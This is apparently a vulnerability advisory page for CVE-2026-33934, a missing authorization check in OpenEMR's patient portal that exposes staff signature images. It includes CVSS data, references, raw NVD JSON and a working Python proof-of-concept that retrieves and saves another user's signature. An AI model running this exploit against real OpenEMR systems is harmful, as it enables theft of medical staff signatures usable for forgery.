Security Vulnerability Report
CVE-2026-33934 CVSS 4.3 MEDIUM

CVE-2026-33934

Published: 2026-03-26 00:16:40
Last Modified: 2026-03-26 16:28:34

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0.3 have a missing authorization check in `portal/sign/lib/show-signature.php` that allows any authenticated patient portal user to retrieve the drawn signature image of any staff member by supplying an arbitrary `user` value in the POST body. The companion write endpoint (`save-signature.php`) was already hardened against this same issue, but the read endpoint was not updated to match. Version 8.0.0.3 patches the issue.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR < 8.0.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable endpoint
vulnerable_url = "http://target-openemr-site.com/portal/sign/lib/show-signature.php"

# Attacker's authenticated session cookie (e.g., low-priv patient account)
session_cookies = {
    "PHPSESSID": "attacker_valid_session_id_here"
}

# The vulnerability allows specifying any 'user' value to retrieve their signature
# In this example, we attempt to retrieve the signature of user ID '1' (often an admin)
payload_data = {
    "user": "1"
}

try:
    print("[*] Attempting to exploit CVE-2026-33934...")
    # Send POST request to the vulnerable endpoint
    response = requests.post(vulnerable_url, cookies=session_cookies, data=payload_data)

    # Check response status and content type to verify if data was retrieved
    if response.status_code == 200:
        content_type = response.headers.get('Content-Type', '')
        if 'image' in content_type:
            print("[+] Exploit successful! Signature image retrieved.")
            print(f"[+] Content-Type: {content_type}")
            # Save the stolen signature to a file
            with open("stolen_signature.png", "wb") as f:
                f.write(response.content)
            print("[+] File saved as 'stolen_signature.png'")
        else:
            print("[-] Unexpected response. Target may not be vulnerable or patched.")
            print("[-] Response body:", response.text[:200])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")
```

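References

https://github.com/openemr/openemr/commit/ae7ee1872d2e6300b165e24687cc90cf6847a4e5 (Patch)
https://github.com/openemr/openemr/releases/tag/v8_0_0_3 (Product)
https://github.com/openemr/openemr/security/advisories/GHSA-w9w5-7x6h-657q (Exploit, Vendor Advisory)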

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33934", "sourceIdentifier": "[email protected]", "published": "2026-03-26T00:16:40.290", "lastModified": "2026-03-26T16:28:33.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0.3 have a missing authorization check in `portal/sign/lib/show-signature.php` that allows any authenticated patient portal user to retrieve the drawn signature image of any staff member by supplying an arbitrary `user` value in the POST body. The companion write endpoint (`save-signature.php`) was already hardened against this same issue, but the read endpoint was not updated to match. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación gratuita y de código abierto para la gestión de registros de salud electrónicos y práctica médica. Las versiones anteriores a la 8.0.0.3 tienen una verificación de autorización faltante en 'portal/sign/lib/show-signature.php' que permite a cualquier usuario autenticado del portal de pacientes recuperar la imagen de la firma dibujada de cualquier miembro del personal al proporcionar un valor 'user' arbitrario en el cuerpo POST. El endpoint de escritura asociado ('save-signature.php') ya estaba reforzado contra este mismo problema, pero el endpoint de lectura no se actualizó para coincidir. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/ae7ee1872d2e6300b165e24687cc90cf6847a4e5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-w9w5-7x6h-657q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}